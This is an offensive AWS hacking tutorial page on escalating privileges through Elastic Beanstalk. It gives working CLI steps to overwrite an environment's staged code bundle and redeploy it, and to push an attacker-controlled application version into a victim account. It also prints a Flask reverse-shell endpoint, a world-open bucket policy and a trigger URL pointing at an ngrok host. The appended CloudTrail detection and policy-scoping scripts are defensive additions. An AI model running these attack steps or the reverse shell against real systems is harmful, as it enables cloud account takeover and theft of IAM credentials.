AWS - Elastic Beanstalk Privesc

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Elastic Beanstalk

More information about Elastic Beanstalk in:

AWS - Elastic Beanstalk Enum

To perform sensitive actions in Beanstalk you will need a lot of sensitive permissions across many different services. As a reference, check the permissions granted by the managed policy arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk

elasticbeanstalk:RebuildEnvironment, S3 write permissions & many more

With write permissions over the S3 bucket that stores the environment's code and permission to rebuild the application (elasticbeanstalk:RebuildEnvironment plus a few more related to S3, EC2 and CloudFormation are required), you can modify the code, rebuild the application and, the next time the application is accessed, it will execute your new code. This lets an attacker compromise the application and the credentials of the IAM role attached to its instances.

# The staging bucket follows the naming convention elasticbeanstalk-<region>-<account-id>
# Create folder
mkdir elasticbeanstalk-eu-west-1-947247140022
cd elasticbeanstalk-eu-west-1-947247140022
# Download code
aws s3 sync s3://elasticbeanstalk-eu-west-1-947247140022 .
# Change code: add your payload to the extracted bundle, then re-zip it under the same key
unzip 1692777270420-aws-flask-app.zip
zip 1692777270420-aws-flask-app.zip <files to zip>
# Upload code (overwrite the original object)
aws s3 cp 1692777270420-aws-flask-app.zip s3://elasticbeanstalk-eu-west-1-947247140022/1692777270420-aws-flask-app.zip
# Rebuild env (terminates and recreates the environment's resources, so this is noisy and causes downtime)
aws elasticbeanstalk rebuild-environment --environment-name "env-name"

elasticbeanstalk:CreateApplication, elasticbeanstalk:CreateEnvironment, elasticbeanstalk:CreateApplicationVersion, elasticbeanstalk:UpdateEnvironment, iam:PassRole, and more...

The permissions listed above, plus a number of S3, EC2, cloudformation, autoscaling and elasticloadbalancing permissions, are needed to build an Elastic Beanstalk environment from scratch.

  • Create an AWS Elastic Beanstalk application and environment (iam:PassRole is what lets you hand the instance profile to the environment):

aws elasticbeanstalk create-application --application-name MyApp
aws elasticbeanstalk create-environment --application-name MyApp --environment-name MyEnv --solution-stack-name "64bit Amazon Linux 2 v3.4.2 running Python 3.8" --option-settings Namespace=aws:autoscaling:launchconfiguration,OptionName=IamInstanceProfile,Value=aws-elasticbeanstalk-ec2-role

If the environment already exists and you don't want to create a new one, you can simply update the existing one.

  • Package your application code and its dependencies into a ZIP file:

zip -r MyApp.zip .
  • Upload the ZIP file to the S3 staging bucket:

aws s3 cp MyApp.zip s3://elasticbeanstalk-<region>-<accId>/MyApp.zip
  • Create an AWS Elastic Beanstalk application version from that bundle:

aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-1.0 --source-bundle S3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="MyApp.zip"
  • Deploy the application version to your AWS Elastic Beanstalk environment:

aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0
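Both procedures on this page so far (overwriting the staged bundle and rebuilding, or creating a new application version and updating the environment) leave the same trail in CloudTrail: an S3 PutObject into the elasticbeanstalk-<region>-<account-id> staging bucket followed shortly by an Elastic Beanstalk deploy call from the same principal. The Python below is an added detection example, not code from HackTricks. The CloudTrail records it runs over are constructed, and the requestParameters layout (bucketName/key for S3 data events, sourceBundle.s3Bucket for CreateApplicationVersion) is assumed to mirror the API parameter names, which you should confirm against your own trail. It also flags a CreateApplicationVersion whose bundle lives in a bucket named for a different account, which is the cross-account trick described further down the page.

```python
"""Correlate Elastic Beanstalk deploy calls with writes to the staging bucket.

Added example (not code from the original page). SAMPLE_EVENTS below are
constructed CloudTrail-style records; the requestParameters field names are
assumed to mirror the API parameter names (check against your own trail)."""
import re
from datetime import datetime, timedelta

# Staging buckets are named elasticbeanstalk-<region>-<12-digit account id>
EB_BUCKET_RE = re.compile(r"^elasticbeanstalk-(?P<region>[a-z0-9-]+)-(?P<account>\d{12})$")
DEPLOY_EVENTS = {"RebuildEnvironment", "UpdateEnvironment", "CreateApplicationVersion"}
WINDOW = timedelta(minutes=30)  # a staged write is correlated with deploys this long afterwards


def eb_bucket_account(name):
    """Account id encoded in an Elastic Beanstalk staging-bucket name, or None."""
    m = EB_BUCKET_RE.match(name or "")
    return m.group("account") if m else None


def _when(ev):
    return datetime.strptime(ev["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def _who(ev):
    return ev.get("userIdentity", {}).get("arn", "unknown")


def find_staging_abuse(events, trusted_deployers=frozenset()):
    """Return alert dicts for two patterns:
    eb-staged-code-deploy    PutObject into an EB staging bucket, then RebuildEnvironment /
                             UpdateEnvironment / CreateApplicationVersion by the same principal
                             within WINDOW (skipped for trusted_deployers, e.g. the CI role)
    eb-foreign-source-bundle CreateApplicationVersion whose bundle bucket is named for a
                             different account than the one receiving the call
    """
    alerts = []
    staged = {}  # principal arn -> (time, bucket, key) of the last EB-bucket write
    for ev in sorted(events, key=_when):
        params = ev.get("requestParameters") or {}
        who, t, name = _who(ev), _when(ev), ev["eventName"]
        if ev["eventSource"] == "s3.amazonaws.com" and name == "PutObject":
            if eb_bucket_account(params.get("bucketName")):
                staged[who] = (t, params["bucketName"], params.get("key"))
        elif ev["eventSource"] == "elasticbeanstalk.amazonaws.com" and name in DEPLOY_EVENTS:
            if who not in trusted_deployers and who in staged and t - staged[who][0] <= WINDOW:
                _, bucket, key = staged.pop(who)
                alerts.append({"rule": "eb-staged-code-deploy", "principal": who, "bucket": bucket,
                               "key": key, "deploy": name, "time": ev["eventTime"]})
            if name == "CreateApplicationVersion":
                bundle = params.get("sourceBundle") or {}
                owner = eb_bucket_account(bundle.get("s3Bucket"))
                if owner and owner != ev.get("recipientAccountId"):
                    alerts.append({"rule": "eb-foreign-source-bundle", "principal": who,
                                   "bucket": bundle["s3Bucket"], "key": bundle.get("s3Key"),
                                   "bucket_owner": owner, "time": ev["eventTime"]})
    return alerts


def _ev(time, source, name, arn, params, account="111111111111"):
    return {"eventTime": time, "eventSource": source, "eventName": name,
            "userIdentity": {"arn": arn}, "recipientAccountId": account,
            "requestParameters": params}


ATTACKER = "arn:aws:iam::111111111111:user/compromised"   # assumed identity
CI_ROLE = "arn:aws:iam::111111111111:role/ci-deployer"    # assumed legitimate deployer
EB = "elasticbeanstalk.amazonaws.com"
S3 = "s3.amazonaws.com"

# Constructed sample trail: a compromised user overwrites the bundle and rebuilds, then
# pulls a version from another account's bucket; later the CI role does a normal deploy.
SAMPLE_EVENTS = [
    _ev("2024-05-01T10:00:00Z", S3, "PutObject", ATTACKER,
        {"bucketName": "elasticbeanstalk-eu-west-1-111111111111", "key": "1692777270420-aws-flask-app.zip"}),
    _ev("2024-05-01T10:04:00Z", EB, "RebuildEnvironment", ATTACKER, {"environmentName": "env-name"}),
    _ev("2024-05-01T11:00:00Z", EB, "CreateApplicationVersion", ATTACKER,
        {"applicationName": "MyApp", "versionLabel": "MyApp-2.0",
         "sourceBundle": {"s3Bucket": "elasticbeanstalk-us-east-1-222222222222", "s3Key": "revshell.zip"}}),
    _ev("2024-05-01T12:00:00Z", S3, "PutObject", CI_ROLE,
        {"bucketName": "elasticbeanstalk-eu-west-1-111111111111", "key": "app-3.zip"}),
    _ev("2024-05-01T12:01:00Z", EB, "UpdateEnvironment", CI_ROLE,
        {"environmentName": "MyEnv", "versionLabel": "app-3"}),
]

if __name__ == "__main__":
    for alert in find_staging_abuse(SAMPLE_EVENTS, trusted_deployers={CI_ROLE}):
        print(alert)
```

A legitimate CI pipeline produces exactly the PutObject-then-deploy sequence, so the trusted_deployers allowlist is what keeps this from paging on every routine deploy; the foreign-bucket rule is deliberately not allowlisted, because a version being built from another account's staging bucket deserves a look whoever requested it. S3 data events are not in CloudTrail by default, so the PutObject half of the correlation only works if data-event logging is enabled for the staging bucket.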

elasticbeanstalk:CreateApplicationVersion, elasticbeanstalk:UpdateEnvironment, cloudformation:GetTemplate, cloudformation:DescribeStackResources, cloudformation:DescribeStackResource, autoscaling:DescribeAutoScalingGroups, autoscaling:SuspendProcesses, autoscaling:ResumeProcesses

First of all you need to create, in your own account, a legitimate Beanstalk environment running the code you would like to execute in the victim, following the previous steps. Basically a simple zip containing these 2 files (only the application is shown below; note that the Beanstalk Python platform looks for a WSGI callable named application, which is why the Flask object has that name):

from flask import Flask, request, jsonify
import subprocess, os, socket

application = Flask(__name__)

@application.errorhandler(404)
def page_not_found(e):
    return jsonify('404')

@application.route("/")
def index():
    return jsonify('Welcome!')


@application.route("/get_shell")
def search():
    # Reverse shell: connect back to ?host=...&port=... and attach an interactive /bin/sh to the socket
    host = request.args.get('host')
    port = request.args.get('port')
    if host and port:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, int(port)))
        os.dup2(s.fileno(), 0)
        os.dup2(s.fileno(), 1)
        os.dup2(s.fileno(), 2)
        p = subprocess.call(["/bin/sh", "-i"])
    return jsonify('done')

if __name__ == "__main__":
    application.run()

Once you have your Beanstalk environment running your rev shell, it's time to migrate it to the victim's environment. To do so you need to update the Bucket Policy of your own Beanstalk S3 bucket so the victim's account can read the bundle. Note that the policy below, as written with Principal "*" and s3:*, opens the bucket to EVERYONE, for writes and deletes as well as reads; if you can, restrict the principal to the victim account and the actions to the read/list calls Beanstalk actually needs:

{
    "Version": "2008-10-17",
    "Statement": [
        {
            "Sid": "eb-af163bf3-d27b-4712-b795-d1e33e331ca4",
            "Effect": "Allow",
            "Principal": {
                "AWS": "*"
            },
            "Action": [
                "s3:ListBucket",
                "s3:ListBucketVersions",
                "s3:GetObject",
                "s3:GetObjectVersion",
                "s3:*"
            ],
            "Resource": [
                "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022",
                "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*"
            ]
        },
        {
            "Sid": "eb-58950a8c-feb6-11e2-89e0-0800277d041b",
            "Effect": "Deny",
            "Principal": {
                "AWS": "*"
            },
            "Action": "s3:DeleteBucket",
            "Resource": "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022"
        }
    ]
}
# Run the following with the victim's credentials
# Use a new --version-label
# Use the bucket from your own (attacker) account
aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-2.0 --source-bundle S3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="revshell.zip"

# This step needs the extra permissions listed above; deploy the new version label, not the old one
aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-2.0

# To get your rev shell just access the exposed web URL with params such as:
http://myenv.eba-ankaia7k.us-east-1.elasticbeanstalk.com/get_shell?host=0.tcp.eu.ngrok.io&port=13528
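The bucket policy used in this procedure grants s3:* to the anonymous principal, which is far more than the cross-account read the victim's CreateApplicationVersion call needs. The Python below is an added example, not part of the original page: it audits a bucket policy for anonymous Allow statements and rewrites them into a read-only grant scoped to a single account. WILDCARD_POLICY is a constructed copy of the policy above, and the account id passed to scope_to_account is a placeholder for the victim account.

```python
"""Audit an Elastic Beanstalk staging-bucket policy and scope it to one account.

Added example, not from the original page. WILDCARD_POLICY is a constructed copy
of the page's public policy; the victim account id is a placeholder."""
import copy
import json

WILDCARD_POLICY = {
    "Version": "2008-10-17",
    "Statement": [
        {"Sid": "eb-af163bf3-d27b-4712-b795-d1e33e331ca4", "Effect": "Allow",
         "Principal": {"AWS": "*"},
         "Action": ["s3:ListBucket", "s3:ListBucketVersions", "s3:GetObject",
                    "s3:GetObjectVersion", "s3:*"],
         "Resource": ["arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022",
                      "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*"]},
        {"Sid": "eb-58950a8c-feb6-11e2-89e0-0800277d041b", "Effect": "Deny",
         "Principal": {"AWS": "*"}, "Action": "s3:DeleteBucket",
         "Resource": "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022"},
    ],
}

# Everything Beanstalk needs from a foreign bundle bucket is to list it and read objects.
BUNDLE_READ_ACTIONS = ["s3:GetObject", "s3:GetObjectVersion", "s3:ListBucket", "s3:ListBucketVersions"]


def _as_list(v):
    return v if isinstance(v, list) else [v]


def _principals(stmt):
    """AWS principals of a statement; both "*" and {"AWS": "*"} mean anonymous."""
    p = stmt.get("Principal", {})
    if isinstance(p, str):
        return [p]
    return _as_list(p.get("AWS", []))


def public_statements(policy):
    """Allow statements granted to the anonymous principal, with their actions,
    whether a Condition narrows them, and whether a wildcard action makes them write-capable."""
    found = []
    for s in policy["Statement"]:
        if s.get("Effect") == "Allow" and "*" in _principals(s):
            acts = _as_list(s.get("Action", []))
            found.append({"sid": s.get("Sid"), "actions": acts,
                          "conditioned": "Condition" in s,
                          "wildcard_action": any(a in ("*", "s3:*") for a in acts)})
    return found


def scope_to_account(policy, account_id):
    """Copy of policy in which every anonymous Allow becomes a read-only grant to one
    account's root principal. Deny statements and non-public statements are left alone."""
    scoped = copy.deepcopy(policy)
    for s in scoped["Statement"]:
        if s.get("Effect") == "Allow" and "*" in _principals(s):
            s["Principal"] = {"AWS": f"arn:aws:iam::{account_id}:root"}
            s["Action"] = list(BUNDLE_READ_ACTIONS)
    return scoped


if __name__ == "__main__":
    for finding in public_statements(WILDCARD_POLICY):
        print("public:", finding)
    # 123456789012 is a placeholder for the victim account id
    print(json.dumps(scope_to_account(WILDCARD_POLICY, "123456789012"), indent=2))
```

Write the scoped policy to a file and apply it with aws s3api put-bucket-policy --bucket <your-bucket> --policy file://scoped.json. Granting to the account root means any identity in the victim account whose own IAM policy allows those S3 reads on your bucket ARN can fetch the bundle, which covers the caller of create-application-version and the environment's instance profile, while leaving nothing open to the rest of the internet.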